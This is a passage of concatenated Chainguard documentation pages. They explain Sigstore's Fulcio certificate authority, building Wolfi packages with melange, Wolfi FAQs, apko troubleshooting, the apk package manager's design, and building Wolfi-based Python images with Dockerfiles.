parties that need to attest and verify identities. By connecting their identity to a verified email or other unique identifier, Fulcio enables software developers to confirm certain credentials associated with themselves. Developers can attest that they truly did create their signed artifacts and later software consumers can then verify that the software artifacts they use really did come from the expected software developers. Certificates A certificate is a signed document that associates a public key with an identity such as an email address. The term “document” refers to a file or any electronic representation of a paper document. That the document must be signed implies that some party uses a digital signature to certify the document. You could think of a certificate as the digital equivalent of a passport: a document from a trusted authority that links information to an identity. Fulcio issues X.509 certificates. X.509 certificates are an International Telecommunication Union (ITU) standard that defines the format of public keys, and they are commonly used in many internet protocols, such as those that enable HTTPS. These certificates are what bind a given identity to a public key by using a digital signature. Below is an example of an X.509 certificate used to authenticate a secure website connection. Certificate Authority You rely on certificate authorities every time you open a browser and make a connection to a website. These certificate authorities, such as Let’s Encrypt, sign certificates that link a particular domain with a particular public key, allowing users to use HTTPS securely, knowing that a malicious third party is not pretending to be the real website. When a user visits a website, the user’s browser checks that a certificate authority trusted by the browser vouches for that certificate. As a certificate authority, Fulcio operates analogously to the certificate authorities that are responsible for web encryption. Fulcio does not, however, tie website domains to public keys. Instead, Fulcio creates and signs certificates that bind together email addresses and public keys. Binding an email address and public key is critical to how Sigstore works. Software developers want to attest that they were indeed responsible for publishing a particular software artifact. Fulcio lets these developers issue claims associated with their public identity. As a result, software consumers can later check the end-to-end integrity of the software artifacts they consume and know that this artifact was indeed created by the party that claims to have produced that artifact. To return to the digital passport metaphor, each national government, the entities that issue passports, is equivalent to a certificate authority. OpenID Connect (OIDC) Tokens OpenID Connect (or OIDC) is a protocol that enables authentication without the service provider having to store and manage passwords. Authentication refers to establishing that the person operating an application or using a browser is who they claim to be. Allowing the service, like Sigstore, to rely on OIDC means that the service transfers responsibility of authenticating the subject to other OIDC providers like GitHub, Google, and Microsoft, solving the key management issues that many online service providers prefer to avoid. The use of the OIDC protocol by Sigstore means that a user can rely on workflows they are already familiar with, such as logging into Google, in order to prove their identity. The OIDC “provider” (Google in this example) then vouches on the user’s behalf to Fulcio that the user is who they say they are. Returning again to the digital passport metaphor, the OIDC protocol is similar to how a passport can be used at an airport to prove your identity. The airport did not issue the passport (that is, the certificate) but it trusts the proof provided via the certificate. How Fulcio Issues Certificates The user initiates a login to Fulcio using an OIDC provider such as GitHub, Google, or Microsoft. The user and an OIDC provider (for instance, GitHub) then engage in the OIDC protocol where the user logs in to GitHub to prove their identity. The OIDC provider, if the login is successful, returns an “access token,” which proves to Fulcio that the user controls the email address they claim to control. Fulcio then creates a certificate and timestamps it, returning the timestamp to the user and placing the certificate in the Rekor transparency log too. The process described above, in reality, can be decomposed into even more steps. For a full understanding with helpful diagrams, consult the Fulcio documentation. The Purpose and Contributions of Fulcio The main task of Fulcio is to link public keys to email addresses. The detailed explanation earlier simply elaborates on how Fulcio binds public keys to email addresses. Why bind public keys to email addresses? Because third parties want to verify that an artifact was signed by the person who claimed they signed the artifact. Fulcio acts as a trusted party that vouches on behalf of its users that a certain user proved their identity at a certain time. This timestamping is an essential part of the process. The timestamp proves that the signing happened at a particular time and it creates a short time window (about 20 minutes) for the user to sign the artifact that they are signing. A verifying party then needs to check that the artifact they are verifying was not only signed by the party that claims to have signed the artifact, but also that it was done within a valid time window. --- ### Building a Wolfi Package URL: https://edu.chainguard.dev/open-source/wolfi/building-a-wolfi-package/ Last Modified: August 21, 2023 Tags: Wolfi, Procedural Wolfi is a Linux distro created specifically for building stripped-down container images that only include the essential packages needed to run applications in containers. This makes it more secure, as there are fewer potential attack vectors due to the reduced surface area. Thanks to a fine-tuned maintenance process combining top-notch automation and established best practices from maintainers, Wolfi packages are updated quickly. This ensures that Wolfi users get patches and latest versions of packages at a much faster pace than other distributions. Additionally, Wolfi includes a number of features that help to ensure the provenance and authenticity of packages. For example, all packages are built directly from source and signed with cryptographic signatures. This helps to prevent malicious code from being introduced into the system. Wolfi also provides a high-quality build-time SBOM as standard for all packages. That being said, it’s important to note that Wolfi is rather new; it just recently crossed the mark of 1,000 packages in the Wolfi OS repository. That means some packages that you would find in a more established distro won’t be available yet in Wolfi. In this article, we’ll cover the whole process involved in building a new Wolfi package, or how a Wolfi package comes to be. Note: Many of the examples shown in this article are based on the Wolfi PHP package, which is a slightly complex build that generates several subpackages from a single melange YAML file. You can keep that link open in a separate tab to use as reference as you go through this guide. How Does it Compile? The first step in building a new Wolfi package is finding official documentation with guidance on how to build the package from source. All Wolfi packages need to be built from source in order to assure provenance and authenticity of package contents. Because Wolfi uses apk and thus has some similar design principles to Alpine, it is a good idea to review the Alpine package index to find out how the package is built there. This can give you insights about configuration options, dependencies, and eventual subpackages that can be stripped from the main package. For example, when compiling PHP from source, you have the choice of compiling several extensions either as built-in or as shared libraries. Although compiling said extensions as built-in packages makes for a simpler build, it also increases the size of the original package and creates a wider surface for possible vulnerabilities. If you aren’t very familiar with building packages from source using tools such as cmake and autoconf, it’s a good idea to compile the package locally first - you don’t need to run make install at the end to get the package installed on your own system, but running the configure and make processes will give you a better understanding of the build requirements and configure options. The melange YAML File The melange YAML file is where you’ll define the details about the package and its build pipeline. If you are familiar with GitHub Actions, you’ll find out that melange definitions are very similar to GitHub Actions workflows. The package Section The melange YAML file starts with a package section, used to define metadata information and runtime dependencies. The following excerpt demonstrates how this section is declared in the Wolfi PHP package YAML: package:name:phpversion:8.2.8epoch:0description:the PHP programming languagecopyright:- license:PHP-3.01dependencies:runtime:- libxml2 Package name: the current convention is to use the same name as the YAML file without extension. This is what people will search for, so it’s a good idea to keep it consistent with how the package is named in other distributions. Description: this information shows up when searching for the package with apk. Version: the version of the package. Epoch: a numeric field set to zero by default; this only needs to be incremented when there is a non-version change in the package. For instance, when build options such as compiler flags have changed or new subpackages have been added but the upstream package version hasn’t changed — in such cases, you’d need to “bump the epoch” in order to trigger the build. License: the package license. It is important to note that only packages with OSI-approved licenses can be included in Wolfi. You can check the relevant package info in the licenses page at opensource.org. Runtime dependencies: any dependencies needed by your package at runtime. Not to be confused with build dependencies, these will come up in the environment section of the file. The environment Section The next section is the environment section. It defines how the build environment should look in order to build your package. Packages listed in this section won’t be included in the final package, because they are only needed at build time. When building locally, you’ll also need to include information about where to find Wolfi packages. This is not needed when submitting the package to the Wolfi OS repository. The contents node is used for that: environment:contents:repositories:- https://packages.wolfi.dev/oskeyring:- https://packages.wolfi.dev/os/wolfi-signing.rsa.pubThe packages section is where you can define dependencies. The following example is an excerpt from the Wolfi PHP package, which is a fairly complex build with many dependencies: environment:contents:packages:- build-base- busybox- file- bison- libtool- ca-certificates-bundle- bzip2-dev- libxml2-dev- curl-dev- openssl-dev- readline-dev- sqlite-dev- libsodium-dev- libpng-dev- libjpeg-turbo-dev- libavif-dev- libwebp-dev- libxpm-dev- libx11-dev- freetype-dev- gmp-dev- icu-dev- openldap-dev- oniguruma-dev- libxslt-dev- postgresql-15-dev- libzipDon’t worry if you don’t know everything you’ll need upfront at build time. Even if you build the package locally first, your system most likely has many dependencies already installed; by paying attention to the output provided by melange, you will be able to figure out what is missing, and iterate until your build environment looks right. One thing that may happen during this process is finding out that one or more dependencies needed by your package are not yet available in Wolfi, so they need to be built first. It is a normal part of the process, so don’t worry — you will be able to build incrementally and test everything locally. The pipeline Section With package metadata and build environment defined, it’s time to create the pipeline that will build your package. The pipeline section has a structure similar to a GitHub Actions workflow, defining a series of steps that must be executed in the same order they are defined, creating output that will be packaged into one or more apk packages. A package build pipeline typically starts with fetching the package (as a tarball or directly from a Git branch) and matching the downloaded artifact against an expected sha hash. Some of the actions executed in build pipelines are very similar across packages: downloading a package, running configure and make, fetching a package from git, etc. Luckily for us, melange bakes a lot of repetitive tasks into reusable pipelines: Downloading Packages fetch git-checkout Autoconf autoconf/configure autoconf/make autoconf/make-install Cmake cmake/build cmake/configure cmake/install Go go/build go/install Meson meson/compile meson/configure meson/install Ruby ruby/build ruby/clean ruby/install Split split/debug split/dev split/infodir split/locales split/manpages split/static Other strip patch Each pipeline can have one or more parameters that should be provided as keypairs in a with entry. For example, a download-and-check has the following structure in the melange YAML, using the built-in pipeline fetch: - uses:fetchwith:uri:https://libzip.org/download/libzip-${{package.version}}.tar.gzexpected-sha256:52a60b46182587e083b71e2b82fcaaba64dd5eb01c5b1f1bc71069a3858e40feNaturally, you can also run raw bash commands in your pipeline. The following example shows the build of Composer, the PHP package manager, which is not compiled as a typical package: - name:Install Composerruns:|EXEC_DIR="${{targets.destdir}}/usr/bin" mkdir -p "${EXEC_DIR}" mv composer.phar "${EXEC_DIR}/composer" chmod +x "${EXEC_DIR}/composer"As indicated, a pipeline step will have either a uses or a run directive. You can have as many steps as you need, and you can use special variable substitutions inside steps: ${{package.name}}: Package name. ${{package.version}}: Package version. ${{package.epoch}}: Package epoch. ${{targets.destdir}}: Directory where final package files will be stored. Everything that lives here will be packed into your final apk. ${{targets.subpkgdir}}: Directory where final subpackage files will be stored. Works the same way as targets.destdir, but for subpackages. You can find more details about available pipelines in the melange pipelines documentation. The subpackages Section As mentioned previously, a package may extract parts of its contents into subpackages in order to make for a slimmer final apk. Many packages have resources that are not required at execution time, including development headers, man pages, shared libraries that are optional. This part is really important in Wolfi, because we want packages to be minimal. The subpackages section of the melange YAML file looks a lot like the pipeline section, and it essentially works the same way. You’ll just have to make sure you place any subpackage files in the targets.subpkgdir location. The split built-in pipelines were created to facilitate the creation of subpackages. They implement code to remove development headers (split/dev), man pages (split/manpages), among other resources that aren’t typically required at runtime. You can experiment with those, just be aware that they use standard path locations and some compiled packages may use different paths for certain resources. For example, this is how a step in the subpackages section would be written, using the split/dev built-in pipeline to generate the php-dev subpackage: - name:php-devdescription:PHP 8.2 development headerspipeline:- uses:split/devLooping with Ranges In some cases, you may find yourself repeating the same task over and over with just a couple different values (such as package names). In such scenarios, you can define a range of data that you can “loop” through in a step. For example, let’s have a look at how the PHP package uses this feature to create its subpackages. First, we define an extensions range. This should go on a data node at the same level as the pipelines section of your YAML: data:- name:extensionsitems:bz2:Bzip2curl:cURLgd:GD imaginggmp:GNU GMP supportldap:LDAPmysqlnd:MySQLndopenssl:OpenSSLpdo_mysql:MySQL driver for PDOpdo_sqlite:SQLite 3.x driver for PDOsoap:SOAPsodium:Sodiumcalendar:CalendarIn the subpackages section, we define a pipeline for that range: - range:extensionsname:"php-${{range.key}}"description:"The ${{range.value}} extension"pipeline:- runs:|export EXTENSIONS_DIR=usr/lib/php/modules export CONF_DIR="${{targets.subpkgdir}}/etc/php/conf.d" mkdir -p "${{targets.subpkgdir}}"/$EXTENSIONS_DIR $CONF_DIR mv "${{targets.destdir}}/$EXTENSIONS_DIR/${{range.key}}.so" \ "${{targets.subpkgdir}}/$EXTENSIONS_DIR/${{range.key}}.so" prefix= [ "${{range.key}}" != "opcache" ] || prefix="zend_" echo "${prefix}extension=${{range.key}}.so" > $CONF_DIR/"${{range.key}}.ini"And this will loop through all values of the extensions range and execute the described pipeline. The update Section This final section of the YAML file is only required when submitting the package to the Wolfi OS repository. The update section is used by Wolfi CI/CD systems to detect new package releases. Wolfi uses multiple tools and services to keep track of upstream releases, including the Release Monitoring service. For packages that are released via GitHub, tracking occurs using the project org/name and a monitored tag. Here’s an example of the update section of the PHP package, which uses the Release Monitoring service: update:enabled:truerelease-monitor:identifier:3627You can obtain the identifier from the release monitoring page - search for the package and grab the ID that shows up at the URL. Here is another example, this time from a package that is released via GitHub: update:enabled:truegithub:identifier:php-amqp/php-amqpstrip-prefix:vtag-filter:vAgain, this section is only required when submitting the package to Wolfi. For more details about Wolfi’s automated package updates, check the official docs on the subject. Building Packages When you feel your YAML is good for a first run, it’s time to build the package with melange. In this guide we’ll use Docker to execute melange in a local environment, using Wolfi’s SDK image. This image contains everything you need to build Wolfi packages with melange and Wolfi-based images with apko. The procedure to build apk packages with melange is explained in more detail in our Getting Started with melange tutorial. Setting Up a Local Development Environment Start by cloning the Wolfi-os repository to your local machine. If you plan on sending a pull request to Wolfi later, you may want to create a fork now and clone your fork instead. git clone https://github.com/wolfi-dev/os.git From the root of the project, run the following command to build your Docker-based development environment: make dev-container This will create an ephemeral container based on the Wolfi SDK image, with a few predefined settings. We’ll call this your Wolfi development environment. ❯ make dev-container docker run --privileged --rm -it \ -v "/home/erika/Projects/os:/home/erika/Projects/os" \ -w "/home/erika/Projects/os" \ -e SOURCE_DATE_EPOCH=0 \ ghcr.io/wolfi-dev/sdk:latest@sha256:99babbe4897d68ec1a342bd958fda7274a072bf112670fa691f64753b04774a9 Welcome to the development environment! [sdk] ❯ You are now ready to build your Wolfi package. Building a Package To build a package, run the following command from your Wolfi SDK environment: make package/<your-package-name> For instance, to build PHP 8.3, which is defined in a file named php-8.3.yaml, you would run make package/php-8.3: [sdk] ❯ make package/php-8.3 make yamlfile=php-8.3.yaml pkgname=php-8.3 packages/x86_64/php-8.3-8.3_rc3-r1.apk make[1]: Entering directory '/home/erika/Projects/os' ############################################################## # build output - removed for readability # ############################################################## ℹ️ | signing apk index at packages/x86_64/APKINDEX.tar.gz ℹ️ | signing index packages/x86_64/APKINDEX.tar.gz with key local-melange.rsa ℹ️ | appending signature to index packages/x86_64/APKINDEX.tar.gz ℹ️ | writing signed index to packages/x86_64/APKINDEX.tar.gz ℹ️ | signed index packages/x86_64/APKINDEX.tar.gz with key local-melange.rsa make[1]: Leaving directory '/home/erika/Projects/os' [sdk] ❯ When the build is finished, you can find the newly built apk(s) in a ./packages directory, in the root of your cloned Wolfi repository. When the build fails It is likely that your build won’t work on the first run, and that is completely normal because there are many moving parts and hidden dependencies when building packages from source. In this scenario, it is often useful to check the build environment, which is preserved for debugging. The build output will inform you where to find these files in your development environment. 2023/10/25 15:37:27 ERROR: failed to build package. the build environment has been preserved: ℹ️ x86_64 | workspace dir: /tmp/melange-workspace-4269468499 ℹ️ x86_64 | guest dir: /tmp/melange-guest-3734950176 The workspace dir is where you will find the melange_out directory, which contains the output of your package. The guest dir directory contains the filesystem of your build environment. Another useful strategy is to include set -x before commands in your pipeline, in order to get extended debug information. - name:Install Composerruns:|set -x EXEC_DIR="${{targets.destdir}}/usr/bin" mkdir -p "${EXEC_DIR}" mv composer.phar "${EXEC_DIR}/composer" chmod +x "${EXEC_DIR}/composer"Most build issues are caused by missed dependencies, even when the error message might be misleading. Another common reason for build errors are wrong file or directory paths. The melange documentation has more pointers to help with debugging, in case you need it. As mentioned before, there might be cases where you’ll need to first build a dependency, and then use this dependency to build the package you need. When working with local dependencies, use the following notation in your packages list, inside the environment section: environment:contents:repositories:- https://packages.wolfi.dev/os- '@local /work/packages'keyring:- https://packages.wolfi.dev/os/wolfi-signing.rsa.pubpackages:- busybox- mypackage@localThis will look for a package named “mypackage” in your local packages/ folder. When the build is successful First of all, celebrate! 🎉 Check the packages folder, you should find a directory for each built architecture (in my case I get x86_64) with your built apks (package + subpackages) along with an APKINDEX.tar.gz file: ./php-full-wolfi-demo/packages/x86_64 ├── APKINDEX.tar.gz ├── php-8.2.7-r1.apk ├── php-amqp-1.11.0-r0.apk ├── php-bcmath-8.2.7-r1.apk ├── php-bz2-8.2.7-r1.apk ├── php-calendar-8.2.7-r1.apk ├── php-cgi-8.2.7-r1.apk ├── php-ctype-8.2.7-r1.apk ├── php-curl-8.2.7-r1.apk ├── php-dbg-8.2.7-r1.apk ├── php-dev-8.2.7-r1.apk ├── php-dom-8.2.7-r1.apk ├── php-exif-8.2.7-r1.apk … In the next section, we’ll demonstrate how you can use the Wolfi SDK for running these checks. Testing your Packages With a successful build, it’s time to test the packages to make sure they are installable and functional, and also to verify they are free of CVEs. Local Installation The first test you’ll want to run with your package is to check if you can use apk to install it without errors. For that, we’ll use the local-wolfi environment, which brings up a new container environment using the Wolfi-base image, with additional settings to make your new package available in the test environment alongside the melange keys that were created to sign your package at build time. We’ll call this your Wolfi Test Environment. make local-wolfi ❯ make local-wolfi docker run --rm -it \ --mount type=bind,source="/home/erika/Projects/os/packages",destination="/work/packages",readonly \ --mount type=bind,source="/home/erika/Projects/os/local-melange.rsa.pub",destination="/etc/apk/keys/local-melange.rsa.pub",readonly \ --mount type=bind,source="/tmp/tmp.LXnQu0hkFn/repositories",destination="/etc/apk/repositories",readonly \ -w "/work/packages" \ cgr.dev/chainguard/wolfi-base:latest d2df519c59df:/work/packages# Your newly built packages should now be available for installation from this environment via apk add. You should use the full path to the .apk file, for instance: apk add ./x86_64/composer-2.6.5-r0.apk Make sure the package can be installed without errors, including dependencies. Checking for CVEs Checking the package for CVEs is a good practice to avoid submitting unpatched packages into Wolfi. If CVEs are found, you may want to apply a security patch before submitting your package, if that is available. From your Wolfi development environment, run the following command, providing the full path to your .apk file: [sdk] ❯ wolfictl scan ./packages/x86_64/composer-2.6.5-r0.apk 🔎 Scanning "./packages/x86_64/composer-2.6.5-r0.apk" ✅ No vulnerabilities found [sdk] ❯ For more information about patching CVEs in Wolfi, check the official docs on this subject. Submitting the Package to Wolfi OS Once you are satisfied with your set of packages and subpackages, you may consider submitting your package to Wolfi OS. From this point, the process is essentially the following: Create a fork of the wolfi-dev/os repository Create a branch with the name of your package, for instance: add-php-package Remove the repositories and keyring sections of the YAML file Add the release-monitor info to the YAML file Run yam to fix any YAML formatting issues Create a signed commit Open a pull request following the instructions from the PR template. The Wolfi Contributing Guide on GitHub has more details about this process. Resources to Learn More If you haven’t yet, check the Wolfi PHP package source file for a more comprehensive view of the melange YAML structure and how that looks in a more complex build. If you’d like to learn more about Wolfi, check the documentation and FAQ for more details about the ecosystem surrounding it. --- ### Wolfi FAQs URL: https://edu.chainguard.dev/open-source/wolfi/faq/ Last Modified: January 8, 2025 Tags: Wolfi, FAQ What is Wolfi and how does it compare to Alpine? Wolfi is our Linux undistro designed from the ground up to support newer computing paradigms such as containers. Although Wolfi has a few similar design principles as Alpine (such as using apk), it is a different distribution that is focused on supply chain security. Unlike Alpine, Wolfi does not currently build its own Linux kernel, instead relying on the host environment (e.g. a container runtime) to provide one. Why build a new Linux distribution from scratch? Without building packages from source, you are at the mercy of an intermediary provider (such as Debian or Alpine) for obtaining the software you need, and none of those intermediaries offer our SLA around zero CVEs. Each intermediary also joins your supply chain’s root of trust. We built Wolfi to achieve an unmatched CVE SLA where Chainguard is the only intermediary you need to trust. The following resources have more details around why and how we built Wolfi: Building the first memory safe distro Building Wolfi from the ground up Wolfi: a new paradigm in Linux for containers Fully bootstrapping Java from source in Wolfi Fully bootstrapping Go from source in Wolfi Is Wolfi free to use? Yes, Wolfi is free and will always be. Can I mix packages from Alpine repositories into a Wolfi-based image? No, it’s not possible to mix Alpine apks with Wolfi apks. If your image requires dependencies that are currently only available for Alpine, you might consider opening a new issue in the wolfi-os repository to suggest the new package addition, or use melange to build a custom apk for your image. How can I find which packages are available in Wolfi? You can search for available packages using the apk search command from within a Wolfi container, as explained in the Searching for Packages section of our Migrating to Chainguard Containers guide. You can also use our APK Explorer tool for a web-based search on the Wolfi repositories. Can I use Wolfi on the Desktop? No. Wolfi is an un-distro, or distroless base to be used within the container / OCI ecosystem. Desktop distributions require additional software that is out of scope for Wolfi’s roadmap. Who maintains Wolfi? Wolfi was created and is currently maintained by Chainguard. What are the plans for long-term Wolfi governance? We intend for Wolfi to be a community-driven project, which means over time it will have multi-vendor governance and maintainers. For now we’re focused on building the project and community, and will revisit this in several months when a community has formed. Where can I get security feeds for Wolfi? See SECURITY.md for information about reporting security incidents concerning and consuming security data about Wolfi. --- ### Troubleshooting apko Builds URL: https://edu.chainguard.dev/open-source/build-tools/apko/troubleshooting/ Last Modified: August 10, 2022 Tags: apko, Troubleshooting Debug Options To include debug-level information on apko builds, add --debug to your build command: docker run --rm -v ${PWD}:/work cgr.dev/chainguard/apko build --debug \ apko.yaml hello-minicli:test hello-minicli.tar \ -k melange.rsa.pub Common Errors When the apk package manager is unable to resolve your requirements to a set of installable packages, you will get an error similar to this: Error: failed to build layer image: initializing apk: failed to fixate apk world: exit status 1 There are two main root causes for this error, which we’ll explain in more detail in the upcoming section: apk cannot find the package in the included repositories, or apk cannot find the apk index for your custom-built packages. The requested package is not in the included repositories Make sure you’ve added the relevant package repositories you need and the package name is correct. Check the Wolfi repository for available packages if you are building Wolfi images, or the Alpine APK index if you are using Alpine as base. If this is your case, you should find error messages similar to this when enabling debug info with the --debug flag: ERROR: unable to select packages: hello-minicli (no such package) apko is unable to find the local packages folder With melange-built package(s), make sure you have a volume sharing your apko / melange files with the location /work inside the apko container. The apk index is missing If you have a functional volume sharing your packages with the apko container and you’re still getting this error, make sure you built a valid apk index as described in step 4 of the Getting Started with melange Guide. If this is your case, you should find error messages similar to this when enabling debug info with the --debug flag: ERROR: Not committing changes due to missing repository tags. Use --force-broken-world to override. This is how your packages directory tree should be set up, including the APKINDEX.tgz file for each architecture: packages ├── aarch64 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk ├── armv7 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk ├── x86 │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk └── x86_64 ├── APKINDEX.tar.gz └── hello-minicli-0.1.0-r0.apk 4 directories, 8 files Further Resources For additional guidance, please refer to the apko repository on GitHub, where you can find more examples or open an issue in case of problems. --- ### Why apk URL: https://edu.chainguard.dev/open-source/wolfi/apk-package-manager/ Last Modified: July 6, 2022 Tags: apko, Conceptual apko uses the apk package manager to compose container images based on declarative pipelines. The apk format was introduced by Alpine Linux to address specific design requirements that could not be met by existing package managers such as apt and dnf. But what makes it different, and why does that matter in the context of apko? Manipulating the Desired State In traditional package managers like dnf and apt, requesting the installation or removal of packages causes those packages to be directly installed or removed, after a consistency check. In apk, when you run apk add package1 to add a package or apk del package2 to delete a package, package1 and package2 are added (or removed) as a dependency constraint in /etc/apk/world, which describes the desired system state. Package installation or removal is done as a side effect of modifying this system state. It is also possible to edit /etc/apk/world with the text editor of your choice and then use apk fix to synchronize the installed packages with the desired system state. Because of this design, you can also add conflicts to the desired system state to prevent bringing in certain packages. For example, there was a bug in Alpine in 2021 where pipewire-pulse was preferred over pulseaudio because the former had a simpler dependency graph. This did not prove to be a problem though, as users could add a conflict against pipewire-pulse by running apk add !pipewire-pulse, thus preventing the package from being brought in. Another result of this design is that apk will never commit a change to the system that leaves it unbootable. If it cannot verify the correctness of the requested change, it will back out adding the constraint before attempting to change what packages are actually installed on the system. This allows the apk dependency solver to be rigid: there is no way to override or defeat the solver other than providing a scenario that results in a valid solution. Verification and Unpacking in Parallel to Package Fetching Unlike other package managers, apk is completely driven by the package fetching I/O when installing or upgrading packages. When the package data is fetched, it is verified and unpacked on the fly. This allows package installations and upgrades to be extremely fast. To make this safe, package contents are initially unpacked to temporary files and then atomically renamed once the verification steps are complete and the package is ready to be committed to disk. Constrained Solver Lately, traditional package managers have promoted their advanced SAT solvers for resolving complicated constraint issues automatically. For example, aptitude is capable of solving Sudoku puzzles. apk’s lack of these solvers can actually be considered a feature. While it is true that apk does have a deductive dependency solver, it does not perform backtracking. The solver is also constrained: it is not allowed to make changes to the /etc/apk/world file. This ensures that the solver cannot propose a solution that will leave your system in an inconsistent state. Trying to make a smart solver instead of appropriately constraining the problem can indicate a poor design choice. The fact that apt, aptitude, and dnf have all written code to constrain their SAT solvers in various ways proves this point. Fast and Safe Package Management Package managers can be made to go fast — and can be safe while doing so — but require a careful design that is well-constrained. apk makes its own tradeoffs: a less powerful but easy to audit solver, trickier parallel execution instead of phase-based execution. These were the right decisions for apk, but may not be the right decisions for other distributions. Final Considerations The reproducible nature of apk makes it the ideal solution for declarative pipelines, since it allows you to describe your desired system state without having to implement a series of individual steps that are not guaranteed to reach completion. When the apk dependency solver is unable to reach an installable set of packages, the build fails, without causing incomplete system changes. This is the ideal behavior for automated pipelines since it eliminates the need for rollbacks, in addition to avoiding the risks of inconsistent environments. An earlier version of this article was published on Ariadne Conill’s Blog. --- ### Hello Wolfi Workshop URL: https://edu.chainguard.dev/open-source/wolfi/hello-wolfi/ Last Modified: November 22, 2024 Tags: Wolfi, Workshop Introduction Software supply chain threats have been growing exponentially in the last few years, according to industry leaders and security researchers (PDF). With the popularization of automated workflows and cloud native deployments, it is more important than ever to provide users with the ability to attest the provenance of all relevant software artifacts that compose the container images being used as build and production runtimes. In this workshop, you’ll learn more about Wolfi, a community Linux undistro designed for the container and cloud-native era. You’ll also learn about melange and apko, Chainguard’s open source toolkit created to build more secure container images. Note: This presentation was recorded on November 16, 2022. Although most of the content holds true to date, some commands and configurations have changed, which caused the demo to become obsolete. For a more up-to-date resource on how to build Wolfi packages, check the Building a Wolfi Package guide. If you are looking for Wolfi-based images for your containerized workloads, check our Images Directory. --- ### Creating Wolfi Images with Dockerfiles URL: https://edu.chainguard.dev/open-source/wolfi/wolfi-with-dockerfiles/ Last Modified: August 1, 2024 Tags: Wolfi, Procedural Introduction Wolfi is a minimal open source Linux distribution created specifically for cloud workloads, with an emphasis on software supply chain security. Using apk for package management, Wolfi differs from Alpine in a few important aspects, most notably the use of glibc instead of musl and the fact that Wolfi doesn’t have a kernel as it is intended to be used with a container runtime. This minimal footprint makes Wolfi an ideal base for both distroless images and fully-featured builder images. A distroless image is a minimal container image that typically doesn’t include a shell or package manager. The extra tightness improves security in several aspects, but it requires a more sophisticated strategy for image composition since you can’t install packages so easily. Wolfi-based builder images are still a better and more secure option to use as base images in your Dockerfile than using a full-fledged Linux distribution, as they are smaller and have fewer CVEs. You can learn more about distroless in our Going Distroless guide. The wolfi-base image, which we’ll be using in this tutorial, is not distroless because it includes apk-tools and bash. In some cases, it can still be used to build a final distroless image, when combined with a distroless runtime in a Docker multi-stage build. That depends on the complexity of the image, the number of dependencies required, and whether these dependencies are system libraries or language ecosystem packages, for example. In this article, we’ll learn how to leverage Wolfi to create safer runtime environments based on containers. To demonstrate Wolfi usage in a Dockerfile workflow (using a Dockerfile to build your image), we’ll create an image based on the wolfi-base image maintained by Chainguard. The goal is to have a final runtime image able to execute a Python application. Step 4 of this guide, which is optional, demonstrates how to turn that into a distroless image by combining it with a Python distroless image, also provided by Chainguard. Requirements You’ll need Docker to build and run the application. Step 1: Obtaining the Demo Application We’ll use the same demo application from the Getting Started with the Python Chainguard Image tutorial to demonstrate how to build a Wolfi Python image with a Dockerfile. The application files are available in the edu-images-demos repository. We’ll start by cloning that repository in a temporary folder so that we can obtain the relevant application files to run the second demo from that tutorial. The following command will clone the demos repository in your /tmp folder: mkdir /tmp/images-demos && \ git clone https://github.com/chainguard-dev/edu-images-demos.git \ /tmp/images-demos We’ll now copy the demo application to a location inside your home folder. mkdir ~/linky && cp -R /tmp/images-demos/python/linky/* ~/linky/ You can now enter the newly created directory in your home folder and inspect its contents: cd ~/linky && ls -la This application will take in an image (linky.png) file and convert it to ANSI escape sequences to render it on the CLI. The code is on the linky.py file, while the requirements.txt file has the dependencies required by the application: setuptools and climage. For your reference, here is the complete linky.py script: '''import climage module to display images on terminal''' from climage import convert def main(): '''Take in PNG and output as ANSI to terminal''' output = convert('linky.png', is_unicode=True) print(output) if __name__ == "__main__": main() You’ll notice that there’s already a Dockerfile in that directory, but it uses the Python Chainguard image in a multi-stage build. In the next step, we’ll replace that with a new Dockerfile that uses the Wolfi-base image to build a Python image from scratch, using Wolfi apks. Step 2: Creating the Dockerfile Now we’ll create the Dockerfile to run the application. This Dockerfile will set up a new user and WORKDIR, copy relevant files, and install dependencies with Pip. It will also define the entry point that will be executed when we run this image with docker run. You can rename the old Dockerfile if you want to keep it for tests later. mv Dockerfile _DockerfileBkp Then, create a new Dockerfile: nano Dockerfile Copy the following content to it: FROMcgr.dev/chainguard/wolfi-baseARG version=3.12WORKDIR/appRUN apk add python-${version} py${version}-pip && \ chown -R nonroot:nonroot /app/USERnonrootCOPY requirements.txt linky.png linky.py /app/RUN pip install -r requirements.txt --userENTRYPOINT [ "python", "/app/linky.py" ]This Dockerfile uses a variable called version to define which Python version is going to be installed in the resulting image. You can change this to one of the Python versions available in Wolfi. To find out which versions are available, please refer to the Searching for Packages section of our migration guide. Save the file when you’re done. In the next step, we’ll build and run the image with docker. Step 3: Building and Running the Image With the Dockerfile ready, you can now build your application runtime. If you’re on macOS, make sure Docker is running. Build your image with: docker build . -t linky-demo If you run into issues, try using sudo. Finally, run the image with: docker run --rm linky-demo You’ll receive a representation of the Chainguard Linky logo on the command line. Step 4 (Optional): Composing Distroless Images in a Docker Multi-Stage Build As discussed in the introduction, in some cases it is possible to combine your fully-featured image with a distroless runtime in a Docker multistage build, and this will give you a final image that is also distroless. Keep in mind that this technique for building distroless images is only viable when there aren’t additional system dependencies that require installation via apk. The Getting Started with Python tutorial shows in detail how to accomplish that using a -dev variant as builder, and the distroless Chainguard Python image as production image. You can also accomplish the same results by using your newly-built image based on wolfi-base in place of the -dev variant of the Python image. We’ll change the build to use a virtual environment to package the dependencies and add an extra step to create the final image. The following Dockerfile uses a multi-stage build to obtain a final distroless image that contains everything the application needs to run. The build requires additional software that is not carried along to the final image. Open a new file and call it DockerfileDistroless: nano DockerfileDistroless Copy the following code into your new file: FROMcgr.dev/chainguard/wolfi-base AS builderARG version=3.12ENV LANG=C.UTF-8ENV PYTHONDONTWRITEBYTECODE=1 ENV PYTHONUNBUFFERED=1 ENV PATH="/app/venv/bin:$PATH"WORKDIR/appRUN apk update && apk add python-$version py${version}-pip && \ chown -R nonroot:nonroot /app/USERnonrootRUN python -m venv /app/venvCOPY requirements.txt /app/RUN pip install --no-cache-dir -r requirements.txtFROMcgr.dev/chainguard/python:latestENV PYTHONUNBUFFERED=1 ENV PATH="/app/bin:$PATH"WORKDIR/appCOPY --from=builder /app/venv /appCOPY linky.py linky.png /app/ENTRYPOINT [ "python", "/app/linky.py" ]Save and close the file when you’re finished. Now, build this image using a custom tag so that you can compare the previously built linky-demo image with its distroless version: docker build . -f DockerfileDistroless -t linky-demo:distroless If you run the new image, it 